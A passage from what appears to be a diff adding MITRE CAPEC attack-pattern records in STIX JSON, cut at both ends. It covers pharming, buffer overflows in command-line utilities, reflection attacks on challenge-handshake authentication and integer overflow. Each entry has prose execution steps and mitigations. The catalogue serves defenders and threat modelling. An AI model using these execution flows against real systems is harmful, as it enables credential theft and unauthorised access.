", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User controllable input used as part of commands to the underlying operating system." + ], + "x_capec_skills_required": { + "High": "The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", + "id": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9de3eaad-1ea7-4658-a9af-71b7e6a839d3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca12abfd-929e-4a4d-9bc0-c87d1daf98db", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands", + "id": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--318ffd75-623d-4e4e-82ef-fe62b9837bef", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23d88ce3-abfc-4664-b193-3c5a020033f6", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.", + "id": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-88-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22a2ec23-338d-4ecf-ac2b-3692d8dd907d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9edf924d-3f02-40cd-81ef-fd883a496feb", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.", + "external_references": [ + { + "external_id": "CAPEC-89", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + } + ], + "id": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pharming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Exploit

  1. Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.

  2. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website

  3. When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.

  4. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \"farm\" sensitive information such as credentials or account numbers.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Vulnerable DNS software or improperly protected hosts file or router that can be poisoned", + "A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All sensitive information must be handled over a secure connection.", + "id": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a29576b-049b-4956-8b53-ce4e9053139a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c0264a9-3fa6-4dd3-bf66-e37487316673", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", + "id": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7002b548-99da-4471-becf-a12babe27aaa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca76ad8b-bd0c-4eec-a930-535476f450af", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", + "id": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-89-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--847a5a83-ab42-40dc-b158-f71498aa91cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26275ac3-7197-403e-90e8-58d6459057cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.", + "external_references": [ + { + "external_id": "CAPEC-9", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/9.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in Local Command-Line Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target system: The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means.

  2. Find injection vector: The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities.

Experiment

  1. Craft overflow command: Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes a command-line utility to the user.", + "The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.", + "id": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13bbe611-6800-4010-ae1b-33b6e818ee74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--206efa47-ea89-4b09-8d45-dc1df1ea72bc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8ab5adf-0b4b-45fd-b053-fad9c99c3106", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb0be5c1-63ea-4146-aec0-793d0f1c8c28", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", + "id": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2dd4206b-b25d-4696-8b9c-de2639f1bb97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not unnecessarily expose services.", + "id": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811c10ed-2d65-4f4d-87e7-31665c01f9bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further", + "id": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4612e9dd-418b-4c42-9d4f-2534fdc5e72c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7753fcf-92fd-495a-8a64-8a0cb4a47728", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", + "id": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6663135-b6d0-4fb2-adb1-200f7f1e01a7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "spec_version": "2.1", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-91", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/91.html" + } + ], + "id": "attack-pattern--78cd63b9-a303-4e6b-8460-0270b0e2510b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: XSS in IMG Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.", + "external_references": [ + { + "external_id": "CAPEC-92", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/92.html" + }, + { + "external_id": "CWE-190", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/190.html" + }, + { + "external_id": "CWE-128", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": 